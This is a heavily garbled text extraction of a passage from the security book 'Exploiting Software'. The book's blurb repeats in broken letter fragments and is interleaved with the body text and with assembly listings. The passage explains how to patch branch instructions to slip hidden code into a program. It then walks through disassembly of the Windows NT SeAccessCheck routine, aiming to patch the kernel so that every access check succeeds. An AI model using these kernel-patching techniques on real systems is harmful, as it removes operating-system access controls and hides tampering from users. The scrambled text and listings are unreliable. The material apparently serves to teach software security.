printf("-"); I ndex

Expl oit ing Softw a re How to Br e ak Code

return 0;

By Gr eg Hoglund , Gar y McGr aw

} Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

The f un ct ion , comp iled w it hout debu gging , look s lik e t h is:

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om

at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . 00401000 cmp dword ptr [esp+4],1 This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t 00401005 jne 0040101A 00401007 Why sof push t w ar e ex ploit w407034h ill con t inue t o be a ser ious p r oblem 0040100C call When net w or k secur it y00401060 m ech anisms do n ot w or k 00401011 add At t ack pat t er ns

esp,4

Rev er se mov engineer in g 00401014

eax,2Ah

Classic at t acks ag ainst serv er soft w ar e 00401019 ret Sur pr ising at t acks ag ainst clien t soft war e 0040101A push 407030h Tech niqu es f or cr aft ing m aliciou s inpu t 0040101F call 00401060 The t echn ical det ails of b uf fer ov er f low s 00401024 add esp,4 Root k it s 00401027 xor eax,eax Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak 00401029 ret soft w ar e.

I n t his list in g, w e can see t hat t he com piled pr ogr am has sev er al jm p st at ement s. These st at em cause t he cod e t o b ran ch . Ty pically t hese b r anches occu r as a r esult of if() or while() calls pr e in t he sour ce code. We can t ak e adv ant age of t his f act and subt ly alt er p rog ram flow . Pat ches p l ov er br anching st at ement s do not r equ ir e code t o be sh if t ed in an y w ay. That is, w e can cause t h

ju m p st at em ent t o go elsew here wit h out alt er ing t he cod e ar ound it . I n t his ex amp le, we alt er a st at ement t o br anch t o our added TRACE cod e. Af t er t he TRACE cod e has ex ecut ed, anot her j um p used t o t ak e t h e pr ogr am dir ect ly back t o w h er e it was befor e our sn eak y code b orr ow ed a f ew c The p r ogr am st at e is not alt ered in any obv ious w ay , an d t h e r eg ist er s ar e int act . Th us, for all in and pu r poses, t h e pr ogr am an d it s user rem ain com plet ely unaw ar e t hat t he pr ogr am has been m odified. The m od if ied p rog ram w ill con t inue t o oper at e w it hout discer nab le ef fect ( u nless you a t he at t acker , t hat is) . •

Table of Content s

•The n ondebuI ndex g ver sion of t he su br out ine p r oduces t he f ollowin g b yt es: Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

0040100083 7C 24 04 01

cmp

dword ptr [esp+4],1

0040100575 13 jne 0040101A How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are 00401007 68 ru34 70det 40ect 00 407034h fir ew alls, int sion ion sy st empush s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. 0040100CE8 4F 00 00 00 call 00401060 Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es83used y ou w ant t o p rot ect y our sof t w ar e fr om 00401011 C4 by 04 bad guy s t o br eak addsof t w ar e. I fesp,4 at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . 00401014B8 2A 00 00 00 mov eax,2Ah This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die 00401019 C3 t r eat m en t f ound in m any rethack ing book s, you w ill learn abou t 0040101A68 30 70 40 00 push 407030h Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem 0040101FE8 3C 00 00 00 call 00401060 When net w or k secur it y m ech anisms do n ot w or k 00401024 83 pat C4t er 04 At t ack ns

add

esp,4

00401027 33 Rev er se C0 engineer in g

xor

eax,eax

00401029 C3 at t acks ag ainst serv er ret Classic soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The OutputDebugString() call look s like t his: The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

77F8F659 B8 9F 00 00 00

mov

eax,9Fh

77F8F65E 8D 54 24 04

lea

edx,[esp+4]

77F8F662 CD 2E

int

2Eh

w hich is called v ia



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley

00401030 38 70 Pub Dat e: 68 February 17, 40 200 400

push

407038h

00401035 FF 15 58 60 40 00

call

dword ptr ds:[406058h]

0040103B C3

ret

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir int ru sion ionetsy st em s, eand ant e nple—adding ot k eep in g out he bad s? p ro Weewh alls, ave accom plishdet edect som hing quit pow er iv f ulir us in tsoft his war ex am t h e tabilit y t og uy t race What t ion oolsand cankbe u sed t o par b reak soft war Th is book rov ides s. s u s some in sig ht execut now w h en t icular pr oge? ram st at es hpave occurt he r ed.answ Thiserallow t he log ical flow inside a pr ogr am , w hich is excellent new s for bud ding soft w ar e exp loit er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t .

Patching the NT Kernel to Remove All Security

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die tru r eat en tef ound m any you abou t As a general le, msom of t h einbest pathack ch esing arebook v er ys,sim plew ill in learn nat u r e. A good pat ch m ay be on ly by t es long. This is cert ain ly t he case w it h t he NT k er nel. I t is possible t o pat ch t he k ern el and re all secu rit y w it h , lit er ally , ju st a f ew w ell- p laced by t es. Th is t r ick w as p ublished by one of us Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem ( Hoglun d) sev er al year s ago. Sin ce t hen, m ult iple sour ces hav e r ep ort ed opt im izing t he ker nel p t o a single b yt e. I n one case, t he d iff er ence b et ween t he or iginal by t e and t he pat ched by t e is ac When net w or k secur it y m ech anisms do n ot w or k only 2 bit s! This leads t o a v ery am u sing " 2 - bit hack" t o t he NT OS. The id ea t hat a single st r at e flip can such a f ar - r eaching an d cat ast r ophic r esult t o t he secur it y of a sy st em is ver y t elli At tcau ackse pat t er ns Perh aps NT secur it y is only w or t h t w o b it s aft er all! Rev er se engineer in g Personally , w e w ould be af r aid t o fly on an air plane in w hich t he f lig ht con t rol sof t w ar e could be easilyClassic an d catatast r ophically ect ed by aw solar t acks ag ainstaff serv er soft ar e flar e. I m agin e t he US n avy , w h ich t o t his day ope ships u sin g a Window s NT inf rast r uct ur e. Cou ld a sim p le bit f lip ( caused by , say, a pow er sur ge) com put erprmising emoraty t acks causeagt hainst e entclien ir e secur y cont Sur t softitwar e r ol of t h e inf orm at ion syst em t o fail? I f t h e bit f l occu r s in a pr im ary d om ain cont r oller t his m ay v ery w ell b e t he case. Many saf et y - cr it ical sof t w a Tech esr em f or ely cr aft ing tm aliciou t en ess, like bit r ot , b ut not Window s NT. Clear ly , fa syst em s arniqu e ext f ault oler ant tso inpu st r ang t oleran ce was not one of t he goals of t he Micr osoft k er nel t eam . The t echn ical det ails of b uf fer ov er f low s The f ollow in g is a r ev er se assemb ly of a cr it ical f un ct ion in t he NT ker nel called SeAccessCheck( Rootlek itfun s ct ion is r esp onsible for en for cin g a go/ n o- go on all ob ject access in t he ker nel. Thi This sing m ean s t hat , no mat t er wh o y ou ar e, if y ou t r y t o access som et hing w it hin t he NT env ir onm ent , y Ex g S ft wt his a ref un is fct illed h . t Th h eist ools, s, and necessar y t ofiles, b reak havpelotiot in get po ast ion wit f ir st goes con for cept all sor t s of kn b itow p ledg at t eren s, in clu ding regist r y soft ar e.sem aphor es, and pipes. The fun ct ion r et ur ns success or failur e depend in g on t he acces han w dles, cont r ols placed on t h e t ar get ob ject . I t per for m s a gr eat deal of com par ison b et w een t he access of t he user and t he ACL of t h e t ar get . The rev er se assem bly is p rov ided by I DA- Pr o, as follow s: .

8019A0E6 ; Exported entry 816. SeAccessCheck 8019A0E6 8019A0E6 ; Table of Content s • •

I ndex

=========================================================================== Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

8019A0E6

Pub lish er: ;Addison 8019A0E6

Wesley

S u b r o u t i n e

Pub Dat e: February 17, 200 4

8019A0E6 Attributes: bp-based I SBN: ;0- 20 1- 786 95 -8

frame

Pages: 51 2

8019A0E6 8019A0E6

public

SeAccessCheck

8019A0E6 SeAccessCheck proc near How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war;e n ot k eep in g out t he bad 8019A0E6 sub_80133D06+B0p ... g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. 8019A0E6 Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om 8019A0E6 arg_0 = dword ptr 8 ; appears to point to a at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . ; Security Descriptor This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t 8019A0E6 arg_4 = dword ptr 0Ch 8019A0E6 arg_8 = tbyte 10h Why sof t w ar e ex ploit w ill con inue t o ptr be a ser ious p r oblem 8019A0E6 = anisms dword do ptrn ot 14h When arg_C net w or k secur it y m ech w or k At t ackarg_10 pat t er ns 8019A0E6

= dword ptr

18h

Rev er arg_14 se engineer in g 8019A0E6

= dword ptr

1Ch

Classic at t acks ag ainst serv = er dword soft w arptr e 8019A0E6 arg_18

20h

Sur pr ising at t acks ag ainst clien t soft war e 8019A0E6 arg_1C = dword ptr 24h Tech niqu es f or cr aft ing m aliciou s inpu t 8019A0E6 arg_20 = dword ptr

28h

The t echn ical det ails of b uf fer ov er f low s 8019A0E6 arg_24 = dword ptr Root k it s

2Ch

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. Not e t h at I DA sh ow s us t h e ar gum ent s t o t he fun ct ion call. This is v ery usef ul b ecause w e can se t he arg um en t s ar e r ef erenced in t h e code below . At t he t im e t h is was discov ered, t he SeAccessC call w as not docum ent ed by Micr osof t d irect ly, but it w as d eclar ed in t he h ead er files pr ov id ed in DDK, w here it w as obv iously called. The call looks lik e t h is:

BOOLEAN SeAccessCheck( • •

Table of Content s

IN PSECURITY_DESCRIPTOR I ndex

SecurityDescriptor,

Expl oit ing Softw a re How to Br e ak Code

IN PSECURITY_SUBJECT_CONTEXT

By Gr eg Hoglund , Gar y McGr aw

IN BOOLEAN

SubjectSecurityContext,

SubjectContextLocked,

Pub lish er: Addison Wesley Pub e: February 17, 200DesiredAccess, 4 INDatACCESS_MASK I SBN: 0- 20 1- 786 95 -8

IN ACCESS_MASK Pages: 51 2

PreviouslyGrantedAccess,

OUT PPRIVILEGE_SET IN PGENERIC_MAPPING

*Privileges

OPTIONAL,

GenericMapping,

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are IN KPROCESSOR_MODE AccessMode, fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. OUT PACCESS_MASK GrantedAccess, Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d OUT es PNTSTATUS t echniqu used by badAccessStatus guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . ); This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Whyissof t w ared, e ex ploit illillcon t o be aThe sertious oblem I f access allow t he callw w r ett inue ur n TRUE. rick , pt rhen, is t o pat ch t h e cod e so t h at t h e ca alway s r et ur n TRUE. A few t w ist s an d t u r ns aside, m ost of t he log ic in t he SeAccessCheck call f o w or ing k secur it ysnip m ech n ots w or k at t he end of t he SeAccessCheck f un ct ion dow n When t o t henet f ollow code petanisms . A call do occur r ight w hich you can see v ia t h e retn in st r u ct ion . The call is ob viously im por t ant because m ost of t he k pat ns sup plied . You can see t he call is p reced ed b y t en p ush in st r u ct ion s. This is par amAtett ack er s ar e tbereing of par am et er s! Rev er se engineer in g Becau se most of t he ar gu ment s ar e being passed t o t he SeAccessCheck f un ct ion , it look s like t h Classic at t acks ag ainst serv er soft w ar e r out ine is a w r apper f or somet h in g deep er . We now d elv e deeper: Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. 8019A20C 8019A20C loc_8019A20C:

; CODE

8019A20C

push

[ebp+arg_24]

8019A20F

push

[ebp+arg_14]

8019A212

push

edi

XREF: SeAccessCheck+10

8019A213

push

[ebp+arg_1C]

8019A216

push

[ebp+arg_10]

8019A219

push

[ebp+arg_18]

push

ebx

push

dword ptr [esi]

8019A21C •

Table of Content s

• 8019A21D

I ndex

Expl oit ing Softw a re How to Br e ak Code

8019A21F By Gr eg Hoglund , Gar y McGr aw

push

dword ptr [esi+8]

8019A222

push

[ebp+arg_0]

call

sub_80199836

cmp

[ebp+arg_8], 0

8019A22E

mov

bl, al

8019A230

jnz

short loc_8019A238

Pub lish er: Addison Wesley

Pub Dat e: 8019A225

February 17, 200 4

; decompiled below

I SBN: 0- 20 1- 786 95 -8 Pages: 8019A22A

51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are 8019A232 push fir ew alls, int ru sion det ect ion sy st em s, and esi ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. 8019A233 call SeUnlockSubjectContext ; not usually hit Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d 8019A238 t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . 8019A238 loc_8019A238: ; CODE XREF: SeAccessCheck+14 This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he 8019A238 bl s, you w ill learn abou t scr ipt k id die t r eat m en t f ound inmov m any hackal, ing book 8019A23A Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem 8019A23A loc_8019A23A: ; CODE When net w or k secur it y m ech anisms do n ot w or k 8019A23A At t ack pat t er ns 8019A23A Rev er se engineer in g

XREF: SeAccessCheck+4C

; SeAccessCheck+65 ... pop

edi

8019A23B pop Classic at t acks ag ainst serv er soft w aresi e 8019A23C ebxe Sur pr ising at t acks ag ainst pop clien t soft war 8019A23D pop s inpuebp Tech niqu es f or cr aft ing m aliciou t The t echn ical det ails of b ufretn fer ov er f low s 8019A23E 28h Root k SeAccessCheck it s 8019A23E

endp

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. The cod e for t he call sub_80199836 is decom piled. So far w e hav en 't mad e any chan ges t o t he c because w e r eally ar e j ust t r y ing t o f ind our w ay ar ou nd. Th e follow ing r out ine is called d irect ly SeAccessCheck an d does t he act u al, real w or k . I t is h er e w e w ill b eg in p at ch ing t he k ern el. I DA- Pr o allow s y ou t o cr eat e com m ent s in t he sour ce. You can see t he com m en t s m ade as we st t hr ou gh t he sour ce. To learn w hat w as hap pening , w e creat e a file on our com pu t er and set t he per m issions so t hat w e can 't access it . We t h en t r ied r epeat edly t o access t he f ile w h ile set t ing b

point s in t he k er nel u sin g Sof t I ce. W henever w e h it t he br eak point , w e sing le st ep t hr oug h t he s using Soft I ce. The f ollow in g is a r esult of per haps a hu ndr ed t rip s t hr oug h t h e code in r eal t ime. The f ollow in g is a subr out in e called fr om SeAccessCheck. Looks lik e m ost of t h e w ork is bein g d her e. We'll t r y t o pat ch t his r out in e.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley

80199836 Pub Dat e: ;February

17, 200 4

I SBN: 0- 20 1- 786 95 -8

============================================================================== Pages: 51 2

80199836 80199836 ;

S u b r o u t i n e

How d oes sof w are br eak ? How do at t ackerframe s m ake sof t w ar e br eak on p ur pose? Why are 80199836 ; tAttributes: bp-based fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. 80199836 Ex p lo i t in gsub_80199836 S o ft w a re is loaded proc w it h ex amp les of r eal ;at CODE t ack s, at t ack pat tPAGE:80199FFA er ns, t ools, an d 80199836 near XREF: t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really ied ou t . 80199836 ; carr SeAccessCheck+13F ... This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he 80199836 scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t 80199836 var_14

= dword ptr -14h

Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem 80199836 var_10 = dword ptr -10h When net w or k secur it y m ech anisms do n ot w or k 80199836 var_C = dword ptr -0Ch At t ack pat t er ns 80199836 var_8 = dword ptr -8 Rev er se engineer in g 80199836 var_2 = byte ptr -2 Classic at t acks ag ainst serv er soft w ar e 80199836 arg_0 = dword ptr 8 Sur pr ising at t acks ag ainst clien t soft war e 80199836 arg_4 = dword ptr 0Ch Tech niqu es f or cr aft ing m aliciou s inpu t 80199836 arg_8 = dword ptr The t echn ical det ails of b uf fer ov er f low s

10h

80199836 arg_C Root k it s

14h

= dword ptr

80199836 =h dword ptrcon18h Ex p lo i t in garg_10 S o ft w a re is f illed wit t h e t ools, cept s, and kn ow ledg e necessar y t o b reak soft w ar e. 80199836 arg_16 = byte ptr 1Eh 80199836 arg_17

= byte

ptr

1Fh

80199836 arg_18

= dword ptr

20h

80199836 arg_1C

= dword ptr

24h

80199836 arg_20

= dword ptr

28h

80199836 arg_24

= dword ptr

2Ch

80199836 80199836

push



Table of Content s



I ndex

80199837

mov

Expl oit ing Softw a re How to Br e ak Code

80199839

sub

ebp ebp, esp esp, 14h

By Gr eg Hoglund , Gar y McGr aw

8019983C

push

ebx

push

esi

8019983E

push

edi

8019983F

xor

80199841

mov

Pub lish er: Addison Wesley

8019983D Pub Dat e:

February 17, 200 4

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

ebx, ebx eax, [ebp+arg_8]

; pulls eax

How d oes sof t w are br eak ? How mov do at t acker[ebp+var_14], s m ake sof t w ar eebx br eak ;onebx p ur pose? Why looks are 80199844 is zero, fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. ; like it init's Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns,; t ools, d local bunchanof t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h owmov r eal at t acks are really carrebx ied ou t . 80199847 [ebp+var_C], This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he 8019984A mov [ebp-1], bl scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t 8019984D

mov

[ebp+var_2], bl

Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem 80199850 cmp eax, ebx When net w or k secur it y m ech anisms do n ot w or k

; check that arg8 is ; NULL

At t ack pat t er ns 80199852 jnz short loc_80199857 Rev er se engineer in g 80199854 mov eax, [ebp+arg_4] Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e

; arg4 pts to ; "USER32

"

80199857 Tech niqu es f or cr aft ing m aliciou s inpu t 80199857 loc_80199857: The t echn ical det ails of b uf fer ov er f low s 80199857 Root k it s

mov

edi, [ebp+arg_C]

; checking some flags

; yoff this on Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar t o bof reak soft w ar e. 8019985A mov [ebp+var_8], eax ; var_8 = arg_4 8019985D

test

edi, 1000000h

; obviously flag ; desired access ; I think...

80199863

jz

short loc_801998CA

; normally this jumps.. ; go ahead and j

80199865

push

[ebp+arg_18]

80199868

push

[ebp+var_8]

push

dword_8014EE94



Table of Content s



I ndex

8019986B

Expl oit ing Softw a re How to Br e ak Code

80199871

push

dword_8014EE90

call

sub_8019ADE0

test

al, al

8019987E

jnz

short loc_80199890

80199880

mov

ecx, [ebp+arg_24]

80199883

xor

al, al

By Gr eg Hoglund , Gar y McGr aw

80199877

; another undoc'd sub

Pub lish er: Addison Wesley

8019987C Pub Dat e:

February 17, 200 4

; return code

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How mov do at t ackerdword s m akeptr sof t[ecx], w ar e br eak on p ur pose? Why are 80199885 0C0000061h fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reakjmp soft war e?loc_80199C0C Th is book p rov ides t he answ er s. 8019988B Ex p lo i t in g;S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d 80199890 t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . =========================================================================== This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he removed source here scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t 801998CA ; Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem =========================================================================== When net w or k secur it y m ech anisms do n ot w or k 801998CA At t ack pat t er ns 801998CA loc_801998CA: ; jump from above lands h Rev er se engineer in g 801998CA ; sub_80199836 Classic at t acks ag ainst serv er soft w ar e 801998CA mov eax, [ebp+arg_0] ; arg0 pts to a Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t 801998CD mov dx, [eax+2] The t echn ical det ails of b uf fer ov er f low s

; Security Descri ; offset 2 is tha ; 80 04 number...

Root k it s

801998D1 mov cx, Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, condx cept s, and kn ow ledg e necessar y t o b reak soft w ar e. 801998D4 and cx, 4 ; 80 04 become 00 801998D8

jz

short loc_801998EA

801998DA

mov

esi, [eax+10h]

; normally doesnt jump ; SD[10h] is an o ; value to the DA

; the SD 801998DD

test

esi, esi

801998DF

jz

short loc_801998EA

801998E1

test

dh, 80h

jz

short loc_801998EC



Table of Content s



I ndex

801998E4

Expl oit ing Softw a re How to Br e ak Code

801998E6

add

esi, eax

; make sure it exists

; FFWDS to first DACL

By Gr eg Hoglund , Gar y McGr aw

; in SD ****** Pub lish er: Addison Wesley

801998E8 Pub Dat e:

February 17, 200 4

jmp

short loc_801998EC

; normally all good

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

; here, go ahead ; jump

801998EA ; How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are =========================================================================== fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. 801998EA Ex p lo i t in gloc_801998EA: S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools,sub_8019983 an d 801998EA ; CODE XREF: t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou ; t . sub_80199836+A9 801998EA This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he 801998EA xor esi, esi scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t 801998EC Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem 801998EC loc_801998EC: ; CODE XREF: sub_8019983 When net w or k secur it y m ech anisms do n ot w or k 801998EC ; sub_80199836+B2 At t ack pat t er ns 801998EC cmp cx, 4 ; jump lands here Rev er se engineer in g 801998F0 jnz loc_80199BC6 Classic at t acks ag ainst serv er soft w ar e 801998F6 test esi, esi Sur pr ising at t acks ag ainst clien t soft war e 801998F8 jz loc_80199BC6 Tech niqu es f or cr aft ing m aliciou s inpu t 801998FE test edi, 80000h The t echn ical det ails of b uf fer ov er f low s Root k it s

; we normally don't match ; so go ahead and jump

80199904 jz short loc_8019995E Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. *** removed source here *** 8019995E ; =========================================================================== 8019995E

8019995E loc_8019995E:

; CODE

8019995E

; sub_80199836+D4 ...

8019995E

movzx

eax, word ptr [esi+4]

80199962

mov

[ebp+var_10], eax



Table of Content s



I ndex

XREF: sub_801998

; jump lands

; offset 4 is number of ; ACEs present in

Expl oit ing Softw a re How to Br e ak Code

; var_10 = # Ace'

By Gr eg Hoglund , Gar y McGr aw

80199965

xor

eax, eax

cmp

[ebp+var_10], eax

jnz

short loc_801999B7

Pub lish er: Addison Wesley

80199967 Pub Dat e:

February 17, 200 4

I SBN: 0- 20 1- 786 95 -8

8019996A

Pages: 51 2

; normally jump

*** removed source here *** 801999A2 ; How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are =========================================================================== fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Whatremoved t ools cansource be u sedhere t o b reak *** *** soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g;S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d 801999B7 t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . =========================================================================== This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he 801999B7 scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t 801999B7 loc_801999B7:

; CODE

XREF: sub_8019983

Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem 801999B7 test byte ptr [ebp+arg_C+3], 2 ; looks like part o When net w or k secur it y m ech anisms do n ot w or k ; the flags data, At t ack pat t er ns ; we usually jump Rev er se engineer in g 801999BB jz loc_80199AD3 Classic at t acks ag ainst serv er soft w ar e *** removed source here *** Sur pr ising at t acks ag ainst clien t soft war e 80199AD3 ; Tech niqu es f or cr aft ing m aliciou s inpu t =========================================================================== The t echn ical det ails of b uf fer ov er f low s 80199AD3 Root k it s 80199AD3 ; e COD XREF: Ex p lo i t in gloc_80199AD3: S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg necessar y t o sub_8019983 b reak soft w ar e. 80199AD3 mov [ebp+var_C], 0 ; jump lands here 80199ADA

add

esi, 8

80199ADD

cmp

[ebp+var_10], 0 ; is number of ACE's zero?

80199AE1

jz

loc_80199B79

; normally not

80199AE7 80199AE7 loc_80199AE7: 80199AE7

; CODE test

edi, edi

XREF: sub_8019983

; the EDI register is very ; important we will conti



Table of Content s



I ndex

; to loop back to this po

Expl oit ing Softw a re How to Br e ak Code

; As we traverse each ACE

By Gr eg Hoglund , Gar y McGr aw

; the EDI register is mod Pub lish er: Addison Wesley

; with each ACE's access

Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

; if a SID match occurs.

Pages: 51 2

